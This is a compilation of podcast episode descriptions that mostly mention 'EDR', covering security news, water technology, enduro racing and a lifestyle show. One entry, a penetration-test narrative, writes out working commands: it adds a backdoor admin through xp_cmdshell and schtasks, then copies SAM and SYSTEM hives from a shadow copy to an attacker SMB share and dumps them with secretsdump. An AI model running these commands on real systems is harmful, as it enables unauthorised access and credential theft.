Help Wanted: What are these odd requests about? An odd request is hitting a number of our honeypots with a somewhat unusual HTTP request header. Please let me know if you no what the request is about. https://isc.sans.edu/forums/diary/Help+Wanted+What+are+these+odd+reuqests+about/32302/ Forta GoAnywhere MFT Vulnerability Forta s GoAnywhere MFT product suffers from a critical deserialization vulnerability. Forta released an advisory disclosing the vulnerability on Thursday. https://www.fortra.com/security/advisories/product-security/fi-2025-012 EDR Freeze A new tool, EDR Freeze, allows regular users to suspend EDR processes. https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html

Electrodialysis Reversal (EDR) is getting a second life. Once overshadowed by reverse osmosis, new designs, capacitive approaches, and ceramic membranes are opening doors in brackish desalination, food and beverage, and even lithium recovery. Costs and complexity remain hurdles, but innovation is giving EDR fresh momentum .Another blind spot: microfibers. Over half a million metric tons entered the environment in 2023, with textile effluents averaging 37 mg/L. BlueTech's new report maps the problem and highlights solutions from ultrafiltration to simple strainers, stressing that no single fix exists — integration and shared data are key.This month's Analyst Alert highlights Norit's PFAS breakthrough: NSF-certified thermal reactivation destroying 99.98% of PFAS in spent carbon. More than reuse, it signals hybrid pathways where removal, regeneration, and destruction combine to outcompete standalone solutions.Patent Watch adds a sustainability twist. Kemira's bio-based flocculants from cellulose and starch cut dewatering times nearly in half, showing that performance and green chemistry can align.Looking ahead: BlueTech partners with Apple at New York Climate Week, then heads to WEFTEC with Imagine H2O for the Innovation Pavilion, breakfast briefings, and this year's top abstracts. A packed fall, set against signals of reinvention across the sector.Join us for the following briefings:30th September: Breakfast Briefing at WEFTEC in Chicago. Register here7th October: The Commercial Future of Water: Microplastics, PFAS & Consumer Trust (in collaboration with Lux Research Inc). Register here--Presented by BlueTech Research®, Actionable Water Technology Market Intelligence. Watch the trailer of Our Blue World: A Water Odyssey. Get involved, and learn more on the website: braveblue.world

Mai menü:KonferenciákHacktivityWITSECITBNRant - Béla és a social engineeringRant - Antenna mesél az EDR élményeiről Elérhetőségeink:TelegramTwitterInstagramFacebookMail: info@hackeslangos.show

No Kubicast de hoje nós recebemos o Leonardo Pinheiro, CRO da Clavis, para um papo direto ao ponto sobre como uma IA feita no Brasil resolve problemas do nosso cenário de cibersegurança. Falamos do Otto – a IA da Clavis –, de como ela nasceu de muita telemetria real de clientes e do porquê conhecer boleto, Pix, WhatsApp e a cadeia financeira nacional muda completamente o jogo. De quebra, confrontamos o mito do “100% seguro” e mostramos como risco, contexto e priorização guiam decisões melhores.Entramos a fundo na plataforma da Clavis (produto+serviço) e nos módulos que orbitam o Otto: gestão de vulnerabilidades, avaliação de fornecedores, correlação de eventos/EDR e validações em cloud. Discutimos quando automação brilha e quando ainda precisamos de gente experiente (ex.: pen test), além de como o Otto responde a perguntas de negócio (“qual meu score?”, “o que mitigar primeiro?”) e conecta tudo numa visão integrada.Também falamos de supply chain security, reputação e como decisões ruins de terceirização estouram no colo da sua marca. No final, tem um bloco sobre comunidade e carreira (SampaSec, Conecta 21, networking) e um respiro cultural com indicações.Links Importantes:- Leonardo Pinheiro - https://www.linkedin.com/in/leonardo-pinheiro-batista/- João Brito - https://www.linkedin.com/in/juniorjbn/- Assista ao FilmeTEArapia - https://youtu.be/M4QFmW_HZh0?si=HIXBDWZJ8yPbpflM- SampaSEC - https://www.linkedin.com/groups/9381855/?fbclid=PAZXh0bgNhZW0CMTEAAact9-j_AzTmFc136pGmO_GWesqvNdULEk-rMQSkGGSlFcpGCbyZLeElRcFVqg_aem_1W_jlM9Z0G5Q6BHoe76xLw- Kubicast 125 - https://www.youtube.com/watch?v=nG7sugocQsg- A vida de Chuck - https://www.imdb.com/pt/title/tt12908150/Hashtags#SegurancaDaInformacao #Ciberseguranca #InteligenciaArtificial #IA #Otto #Clavis #SupplyChainSecurity #PenTest #GestaoDeVulnerabilidades #LGPD #SOC #EDR #ThreatIntelligence #CloudSecurity #Compliance #PlataformaDeSeguranca #Kubernetes #DevOps #DevSecOps #Kubicast #Containers #GetupO Kubicast é uma produção da Getup, empresa especialista em Kubernetes e projetos open source para Kubernetes. Os episódios do podcast estão nas principais plataformas de áudio digital e no YouTube.com/@getupcloud.

Alright, it's time to catch up on the final round of the Enduro World Cup in Morillon and Enduro World Champs in Aletsch Arena with Morgane Charre and Greg Callaghan. Morillon was a brand new venue which the riders said featured some of the best trails they've ever raced. With the titles already decided, it was all in for those chasing the remaining overall podium places and those looking for their first taste of EDR success. Aletsch delivered a challenging sting in the season's tail to see who would take home those sought after World Champs stripes. So sit back, hit play, and enjoy this episode with Morgane Charre and Greg Callaghan. You can also watch this episode on YouTube here. Podcast Stuff Listener Offers Downtime listeners can now get 10% off of Stashed Space Rails. Stashed is the ultimate way to sort your bike storage. Their clever design means you can get way more bikes into the same space and easily access whichever one you want to ride that day. If you have 2 or more bikes in your garage, they are definitely worth checking out. Just head to stashedproducts.com/downtime and use the code DOWNTIME at the checkout for 10% off your entire order. And just so you know, we get 10% of the sale too, so it's a win win. Patreon I would love it if you were able to support the podcast via a regular Patreon donation. Donations start from as little as £3 per month. That's less than £1 per episode and less than the price of a take away coffee. Every little counts and these donations will really help me keep the podcast going and hopefully take it to the next level. To help out, head here. Merch If you want to support the podcast and represent, then my webstore is the place to head. All products are 100% organic, shipped without plastics, and made with a supply chain that's using renewable energy. We now also have local manufacture for most products in the US as well as the UK. So check it out now over at downtimepodcast.com/shop. Newsletter If you want a bit more Downtime in your life, then you can join my newsletter where I'll provide you with a bit of behind the scenes info on the podcast, interesting bits and pieces from around the mountain bike world, some mini-reviews of products that I've been using and like, partner offers and more. You can do that over at downtimepodcast.com/newsletter. Follow Us Give us a follow on Instagram @downtimepodcast or Facebook @downtimepodcast to keep up to date and chat in the comments. For everything video, including riding videos, bike checks and more, subscribe over at youtube.com/downtimemountainbikepodcast. Are you enjoying the podcast? If so, then don't forget to follow it. Episodes will get delivered to your device as soon as it's available and it's totally free. You'll find all the links you need at downtimepodcast.com/follow. You can find us on Apple Podcast, Spotify, Google and most of the podcast apps out there. Our back catalogue of amazing episodes is available at downtimepodcast.com/episodes Photo - Sven Martin

In this sponsored Soap Box edition of the Risky Business podcast, industry legend HD Moore joins the show to talk about runZero's major push into vulnerability management. With its new Nuclei integration, runZero is now able to get a very accurate picture of what's vulnerable in your environment, without spraying highly privileged credentials at attackers on your network. It can also integrate with your EDR platform, and other data sources, to give you powerful visibility into the true state of things on your network and in your cloud. This episode is also available on Youtube. Show notes

Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICEMSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITYSYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:tempbackup ?GLOBALROOTDeviceHarddiskVolumeShadowCopy123 From command prompt on the victim system, I authenticated to my rogue share: net use ATTACKER_IPshare /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM my.attackingipsys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

Three Buddy Problem - Episode 61: We cover a pair of software supply chain breaches (Salesforce Salesloft Drift and NPM/GitHub) that raises big questions about SaaS integrations and the ripple effects across major security vendors. Plus, Apple's new Memory Integrity Enforcement in iPhone 17 and discussion on commercial spyware infections and the value of Apple notifications; concerns around Chinese hardware and surveillance equipment in US infrastructure; Silicon Valley profiting from China's surveillance ecosystem; and controversy around a Huntress disclosure of an attacker's operations after an EDR agent was mistakenly installed. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Ryan Naraine (https://twitter.com/ryanaraine) and Costin Raiu (https://twitter.com/craiu).

In this episode of The Cybersecurity Defenders Podcast, we discuss some intel being shared in the LimaCharlie community.CISA has added CVE-2025-54948, a critical vulnerability in Trend Micro Apex One, to its Known Exploited Vulnerabilities (KEV) catalog, signaling that the flaw has been actively exploited in the wild.PyPI has introduced new security measures to detect and respond to expired domains tied to user accounts, aiming to shut down a known supply chain attack vector: domain resurrection.A recently discovered post-exploitation tool named RingReaper is gaining attention for its sophisticated evasion strategy: abusing the Linux kernel's io_uring interface to operate undetected by standard endpoint detection and response (EDR) systems.A cyberattack on the Netherlands' Openbaar Ministerie (OM), the Public Prosecution Service, has unexpectedly disrupted speed enforcement across the country.Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform.This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

Finally we are BACK in the studio with all the juicyness which is EDR! We dive in deep with the details on our EDR trip which include some hijynx with the Mr. and Mrs. Feelgood and of course Sweet and Sour are back in our sights as we continue our journey with them! Sayless about our missed opportunities in PS and also made some new txt friends in Florida and we are currently booking tickets as we speakCome join us on our journey into the lifestyle as a longtime married couple living in Southern California!Call or text us on our Sweet phone at 951-226-5261Contact us:TheSweetSideOfLifePodcast@outlook.comTikTok:https://www.tiktok.com/@sweetsideoflifepodcast?_t=8f44ltzMqMA&_r=1Twitter(X):@SweetSidePodUse my Bluechew referral code to get $20 off your first order!https://bluechew.com/?coupon=LHAS

Today we're joined by New Zealand enduro racer, Winni Goldsbury. After some stellar U21 results, Winni is competing in her first elite EDR season this year. There's been ups and downs, but the future looks bright for this young rider. We hear how Winni grew up surrounded by bikes and grew to love riding and racing. Winni shares the importance of community in supporting her success so far and we dig into the current state of enduro, along with Winni's hopes for the future. This is a conversation with one of the riders who represents the future of EDR and if this conversation is anything to go by, I think the future looks bright. So sit back, hit play, and enjoy this conversation with Winni Goldsbury. You can also watch this episode on YouTube here. You can follow Winni on Instagram @winni_goldsbury. Podcast Stuff Listener Offers Downtime listeners can now get 10% off of Stashed Space Rails. Stashed is the ultimate way to sort your bike storage. Their clever design means you can get way more bikes into the same space and easily access whichever one you want to ride that day. If you have 2 or more bikes in your garage, they are definitely worth checking out. Just head to stashedproducts.com/downtime and use the code DOWNTIME at the checkout for 10% off your entire order. And just so you know, we get 10% of the sale too, so it's a win win. Patreon I would love it if you were able to support the podcast via a regular Patreon donation. Donations start from as little as £3 per month. That's less than £1 per episode and less than the price of a take away coffee. Every little counts and these donations will really help me keep the podcast going and hopefully take it to the next level. To help out, head here. Merch If you want to support the podcast and represent, then my webstore is the place to head. All products are 100% organic, shipped without plastics, and made with a supply chain that's using renewable energy. We now also have local manufacture for most products in the US as well as the UK. So check it out now over at downtimepodcast.com/shop. Newsletter If you want a bit more Downtime in your life, then you can join my newsletter where I'll provide you with a bit of behind the scenes info on the podcast, interesting bits and pieces from around the mountain bike world, some mini-reviews of products that I've been using and like, partner offers and more. You can do that over at downtimepodcast.com/newsletter. Follow Us Give us a follow on Instagram @downtimepodcast or Facebook @downtimepodcast to keep up to date and chat in the comments. For everything video, including riding videos, bike checks and more, subscribe over at youtube.com/downtimemountainbikepodcast. Are you enjoying the podcast? If so, then don't forget to follow it. Episodes will get delivered to your device as soon as it's available and it's totally free. You'll find all the links you need at downtimepodcast.com/follow. You can find us on Apple Podcast, Spotify, Google and most of the podcast apps out there. Our back catalogue of amazing episodes is available at downtimepodcast.com/episodes Photo - Seb Schieck

In this episode of The Cybersecurity Defenders Podcast, we discuss some intel being shared in the LimaCharlie community.• Attackers are actively exploiting CVE-2023-46604, a remote code execution vulnerability in Apache ActiveMQ first disclosed in October 2023, that is used to compromise cloud-hosted Linux servers.• AshES Cybersecurity has publicly disclosed a critical zero-day vulnerability in Elastic's Endpoint Detection and Response (EDR) platform, specifically in the Microsoft-signed kernel driver elastic-endpoint-driver.sys.• At least a dozen ransomware groups are now deploying kernel-level EDR killers - tools designed specifically to disable endpoint detection and response solutions - as part of their malware arsenal.• Microsoft has released an in-depth technical analysis of PipeMagic, a modular backdoor linked to ransomware operations carried out by Storm-2460, a financially motivated threat group associated with RansomEXX.Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform.This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

Send us a textCheck us out at:  https://www.cisspcybertraining.com/Get access to 360 FREE CISSP Questions:  https://www.cisspcybertraining.com/offers/dzHKVcDB/checkoutGet access to my FREE CISSP Self-Study Essentials Videos:  https://www.cisspcybertraining.com/offers/KzBKKouvNetwork security is the cornerstone of modern cybersecurity, and understanding its intricacies is essential for anyone preparing for the CISSP exam. In this comprehensive episode, Sean Gerber delivers a rapid review of Domain 4: Communications and Network Security, which constitutes 13% of the CISSP exam questions.The episode opens with a cautionary tale about a disgruntled Chinese developer who received a four-year prison sentence for deploying a logic bomb that devastated his former employer's network. This real-world example underscores the critical importance of proper employee termination procedures and privilege management—especially for technical staff with elevated access. As Sean emphasizes, "The eyes of Sauron" should be on any high-privilege employee showing signs of discontent.Diving into Domain 4, Sean expertly navigates through foundational concepts like the OSI and TCP/IP models, explaining how they standardize network communications and why security professionals must understand them to implement effective defense strategies. The discussion progresses through IP networking (both IPv4 and IPv6), secure protocols, multi-layer protections, and deep packet inspection—all crucial components of a robust security architecture.Particularly valuable is Sean's breakdown of modern network technologies like micro-segmentation, which divides networks into highly granular security zones. While acknowledging its power to limit lateral movement during breaches, he cautions that implementation requires sophisticated knowledge of software-defined networking (SDN) and careful planning: "It's better to start small than to go out and think of and get too big when you're dealing with deploying these SDN type of capabilities."Wireless security, content delivery networks, and endpoint protection receive thorough examination, with Sean emphasizing that endpoints are "your first line of detection" and advocating for comprehensive endpoint detection and response (EDR) solutions that go beyond traditional antivirus. The episode concludes with insights on voice communication security, contrasting traditional telephone networks with modern VoIP systems and their unique vulnerabilities.Whether you're preparing for the CISSP exam or looking to strengthen your organization's network security posture, this episode provides actionable insights backed by real-world experience. Ready to deepen your understanding of cybersecurity fundamentals? Subscribe to the CISSP Cyber Training Podcast and check out the free resources available at cisspybertraining.com to accelerate your certification journey.Support the showGain exclusive access to 360 FREE CISSP Practice Questions delivered directly to your inbox! Sign up at FreeCISSPQuestions.com and receive 30 expertly crafted practice questions every 15 days for the next 6 months—completely free! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

In episode 431 of the "Smashing Security" podcast, a self-proclaimed crypto-influencer calling himself CP3O thought he had found a shortcut to riches — by racking up millions in unpaid cloud bills.Meanwhile, we look at the growing threat of EDR-killer tools that can quietly switch off your endpoint protection before an attack even begins.And for something a little different, we peek into the Internet Archive's dystopian Wayforward Machine and take a detour to Mary Shelley's resting place in Bournemouth.All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley, joined this week by special guest Allan "Ransomware Sommelier" Liska.Episode links:Crypto Influencer Sentenced to Prison for Multi-Million Dollar “Cryptojacking” Scheme - US Department of Justice.Ransomware crews don't care about your endpoint security – they've already killed it - The Register.Way Forward Machine - The Internet Archive.Mary Shelley's grave - Atlas Obscura.Smashing Security merchandise (t-shirts, mugs, stickers and stuff)Sponsored by:Proton Drive - Protect your files with end-to-end encryption in Switzerland's secure cloud — only on Proton Drive.SUPPORT THE SHOW:Tell your friends and colleagues about “Smashing Security”, and leave us a review on Apple Podcasts or Podchaser.Become a supporter via Patreon or Apple Podcasts for ad-free episodes and our early-release feed!FOLLOW US:Follow us on Bluesky or Mastodon, or on the Smashing Security subreddit, and visit our website for more episodes.THANKS:Theme tune: "Vinyl Memories" by Mikael Manvelyan.Assorted sound effects: AudioBlocks.ENJOYED THE SHOW?Make sure to check out our sister podcast, "The AI Fix". Hosted on Acast. See acast.com/privacy for more information.

Got a question or comment? Message us here!In this episode, we break down the emerging Crypto24 ransomware attacks that use living-off-the-land techniques to bypass EDR. We'll explore how these attacks unfold and the defensive strategies SOCs and organizations can use, like layered security, enhanced monitoring, and rapid response, to stay ahead of evolving threats.Support the showWatch full episodes at youtube.com/@aliascybersecurity.Listen on Apple Podcasts, Spotify and anywhere you get your podcasts.

HR software giant Workday discloses a data breach. Researchers uncover a zero-day in Elastic's EDR software. Ghost-tapping is an emerging fraud technique where cybercriminals use NFC relay attacks to exploit stolen payment card data. Germany may be on a path to ban ad blockers. A security researcher documents multiple serious flaws in McDonald's systems. There's a new open-source framework for testing 5G security flaws. New York's Attorney General sues the banks behind Zelle over fraud allegations. The DOJ charges the alleged Zeppelin ransomware operator and seizes over $2.8 million in cryptocurrency. Tim Starks from CyberScoop discusses the overlooked changes that two Trump executive orders could bring to cybersecurity. Bots build their own echo chambers. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.CyberWire Guest Today we have Tim Starks from CyberScoop discussing the overlooked changes that two Trump executive orders could bring to cybersecurity. Selected Reading HR giant Workday discloses data breach after Salesforce attack (Bleeping Computer) Researchers report zero-day vulnerability in Elastic Endpoint Detection and Respons Driver that enables system compromise (Beyond Machines) Ghost-Tapping and the Chinese Cybercriminal Retail Fraud Ecosystem (Recorded Future) Is Germany on the Brink of Banning Ad Blockers? User Freedom, Privacy, and Security Is At Risk. (Open Policy & Advocacy) How I Hacked McDonald's (Their Security Contact Was Harder to Find Than Their Secret Sauce Recipe) (bobdahacker) Boffins say tool can sniff 5G traffic, launch 'attacks' without using rogue base stations (The Register) New York claims Zelle's shoddy security enabled a billion dollars in scams  (The Verge) US Seizes $2.8 Million From Zeppelin Ransomware Operator (SecurityWeek) Researchers Made a Social Media Platform Where Every User Was AI. The Bots Ended Up at War (Gizmodo) Audience Survey Complete our annual audience survey before August 31. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

Guest: Craig H. Rowland, Founder and CEO, Sandfly Security Topics: When it comes to Linux environments – spanning on-prem, cloud, and even–gasp–hybrid setups – where are you seeing the most significant blind spots for security teams today?  There's sometimes a perception that Linux is inherently more secure or less of a malware target than Windows. Could you break down some of the fundamental differences in how malware behaves on Linux versus Windows, and why that matters for defenders in the cloud? 'Living off the Land' isn't a new concept, but on Linux, it feels like attackers have a particularly rich set of native tools at their disposal. What are some of the more subtly abused but legitimate Linux utilities you're seeing weaponized in cloud attacks, and how does that complicate detection? When you weigh agent-based versus agentless monitoring in cloud and containerized Linux environments, what are the operational trade-offs and outcome trade-offs security teams really need to consider?  SSH keys are the de facto keys to the kingdom in many Linux environments. Beyond just 'use strong passphrases,' what are the critical, often overlooked, risks associated with SSH key management, credential theft, and subsequent lateral movement that you see plaguing organizations, especially at scale in the cloud? What are the biggest operational hurdles teams face when trying to conduct incident response effectively and rapidly across such a distributed Linux environment, and what's key to overcoming them? Resources: EP194 Deep Dive into ADR - Application Detection and Response EP228 SIEM in 2025: Still Hard? Reimagining Detection at Cloud Scale and with More Pipelines  

Crypto Stable coin tricked people out of 40Billion not the creator faces 25 years in prison, Ransomware attackers what to defeat EDR, Volkswagen in UK charging you monthly for more HP, Should I get another HP Envy? Year old Samsung pop-up on my phone, Is your phone Naked? Travel with Wifi / VPN,

Creepy chatbots, Fortinet, CISA, Agentic AI, FIDO, EDR, Aaran Leyland, and More on this episode of the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-503

Creepy chatbots, Fortinet, CISA, Agentic AI, FIDO, EDR, Aaran Leyland, and More on this episode of the Security Weekly News. Show Notes: https://securityweekly.com/swn-503

Creepy chatbots, Fortinet, CISA, Agentic AI, FIDO, EDR, Aaran Leyland, and More on this episode of the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-503

Stellar Cyber Revolutionizes SOC Cybersecurity Operations with Human-Augmented Autonomous Platform at Black Hat 2025 A Stellar Cyber Event Coverage of Black Hat USA 2025 Las VegasAn ITSPmagazine Brand Story with Subo Guha, Senior Vice President Product, Stellar Cyber____________________________Security operations centers face an unprecedented challenge: thousands of daily alerts overwhelming analyst teams while sophisticated threats demand immediate response. At Black Hat USA 2025 in Las Vegas, Stellar Cyber presented a revolutionary approach that fundamentally reimagines how SOCs operate in the age of AI-driven threats.Speaking with ITSPmagazine's Sean Martin, Subo Guha, Senior Vice President of Products at Stellar Cyber, outlined the company's vision for transforming security operations through their human-augmented autonomous SOC platform. Unlike traditional approaches that simply pile on more automation, Stellar Cyber recognizes that effective security requires intelligent collaboration between AI and human expertise.The platform's three-layer architecture ingests data from any source – network devices, applications, identities, and endpoints – while maintaining vendor neutrality through open EDR integration. Organizations can seamlessly work with CrowdStrike, SentinelOne, Sophos, or other preferred solutions without vendor lock-in. This flexibility proves crucial for enterprises navigating complex security ecosystems where different departments may have invested in various endpoint protection solutions.What sets Stellar Cyber apart is their autonomous SOC concept, which dramatically reduces alert volume from hundreds of thousands to manageable numbers within days rather than weeks. The platform's AI-driven auto-triage capability identifies true positives among thousands of false alarms, presenting analysts with prioritized "verdicts" that demand attention. This transformation addresses one of security operations' most persistent challenges: alert fatigue that leads to missed threats and burned-out analysts.The revolutionary AI Investigator copilot enables natural language interaction, allowing analysts to query the system conversationally. An analyst can simply ask, "Show me all impossible travel incidents between midnight and 4 AM," and receive actionable intelligence immediately. This democratization of security operations means junior analysts can perform at senior levels without extensive coding knowledge or years of experience navigating complex query languages.Identity threat detection and response (ITDR) emerged as another critical focus area during the Black Hat presentation. With identity becoming the new perimeter, Stellar Cyber integrated sophisticated user and entity behavior analytics (UEBA) directly into the platform. The system detects impossible travel scenarios, credential attacks, and lateral movement patterns that indicate compromise. For instance, when a user logs in from Portland at 11 PM and then appears in Moscow 30 minutes later, the platform immediately flags this physical impossibility.The identity protection extends beyond human users to encompass non-human identities, addressing the growing threat of automated attacks powered by large language models. Hackers now leverage generative AI to create credential attacks at unprecedented scale and sophistication, making robust identity security more critical than ever.Guha emphasized that AI augmentation doesn't displace security professionals but elevates them. By automating mundane tasks, analysts focus on strategic decision-making and complex threat hunting. MSSPs report dramatic efficiency gains, scaling operations without proportionally increasing headcount. Where previously a hundred thousand alerts might take weeks to process, requiring extensive junior analyst teams, the platform now delivers actionable insights within days with smaller, more focused teams.The platform's unified approach eliminates tool sprawl, providing CISOs with real-time visualization of their security posture. Executive reporting becomes instantaneous, with high-priority verdicts clearly displayed for rapid decision-making. This visualization capability transforms how security teams communicate with leadership, replacing lengthy reports with dynamic dashboards that convey risk and response status at a glance.Real-world deployments demonstrate significant operational improvements. Organizations report faster mean time to detection and response, reduced false positive rates, and improved analyst satisfaction. The platform's learning capabilities mean it becomes more intelligent over time, adapting to each organization's unique threat landscape and operational patterns.As organizations face increasingly sophisticated threats powered by generative AI, Stellar Cyber's human-augmented approach represents a paradigm shift. By combining AI intelligence with human intuition, the platform delivers faster threat detection, reduced false positives, and empowered security teams ready for tomorrow's challenges. The company's commitment to continuous innovation, evidenced by rapid feature releases between RSA and Black Hat, positions them at the forefront of next-generation security operations. Learn more about Stellar Cyber: https://itspm.ag/stellar-cyber--inc--357947Note: This story contains promotional content. Learn more.Guest: Subo Guha, Senior Vice President Product, Stellar Cyber | https://www.linkedin.com/in/suboguha/ResourcesLearn more and catch more stories from Stellar Cyber: https://www.itspmagazine.com/directory/stellarcyberLearn more and catch more stories from our Black Hat USA 2025 coverage: https://www.itspmagazine.com/bhusa25Learn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programsNewsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-upAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story

Researchers uncover multiple vulnerabilities in a popular open-source secrets manager. Software bugs threaten satellite safety. Columbia University confirms a cyberattack. Researchers uncover malicious NPM packages posing as WhatsApp development tools.A new EDR killer tool is being used by multiple ransomware gangs. Home Improvement stores integrate AI license plate readers into their parking lots. The U.S. federal judiciary announces new cybersecurity measures after cyberattacks compromised its case management system. CISA officials reaffirm their commitment to the CVE Program. Our guest is David Wiseman, Vice President of Secure Communications at BlackBerry, discussing the challenges of secure communications. AI watermarking breaks under spectral pressure. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Today we are joined by David Wiseman, Vice President of Secure Communications at BlackBerry, who is discussing the challenges and misconceptions around secure communications. Selected Reading HashiCorp Vault 0-Day Flaws Enable Remote Code Execution Attacks (GB Hackers) Yamcs v5.8.6 Vulnerability Assessment (VisionSpace) Columbia University says hacker stole SSNs and other data of nearly 900,000 (The Record) Fake WhatsApp developer libraries hide destructive data-wiping code (Bleeping Computer) New EDR killer tool used by eight different ransomware groups (Bleeping Computer) Home Depot and Lowe's Share Data From Hundreds of AI Cameras With Cops (404 Media) US Federal Judiciary Tightens Security Following Escalated Cyber-Attacks (Infosecurity Magazine) CISA pledges to continue backing CVE Program after April funding fiasco  (The Record) CISA Issues 10 ICS Advisories Detailing Vulnerabilities and Exploits (GB Hackers) AI Watermark Remover Defeats Top Techniques  (IEEE Spectrum) Audience Survey Complete our annual audience survey before August 31. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

All links and images can be found on CISO Series. This week's episode is hosted by me, David Spark, producer of CISO Series and Mike Johnson, CISO, Rivian. Joining us is our sponsored guest, Rob Allen, chief product officer, ThreatLocker. In this episode: Large enterprise security demands drive vendor improvements Technical expertise becomes leadership liability without delegation EDR evolution needs prevention focus Career breaks require personal ownership and strategic timing A huge thanks to our sponsor, ThreatLocker ThreatLocker® is a global leader in Zero Trust endpoint security, offering cybersecurity controls to protect businesses from zero-day attacks and ransomware. ThreatLocker operates with a default deny approach to reduce the attack surface and mitigate potential cyber vulnerabilities. To learn more and start your free trial, visit ThreatLocker.com.

Send us a textWould you board a flight if the pilot landed safely only 99.5% of the time? Ricardo Villadiego wouldn't—and he applies that same mindset to cybersecurity. In this high-impact episode from IT Nation Secure 2025, Joey Pinz talks with Ricardo, founder of Lumu, about precision, preparation, and protecting MSPs from EDR evasion and network breaches.✈️ Drawing parallels between aviation and cybersecurity, Ricardo shares how checklists, training, and feedback loops apply to both flying planes and defending networks. He recalls lessons from the Miracle on the Hudson and explains why being “left of boom” isn't optional—it's essential.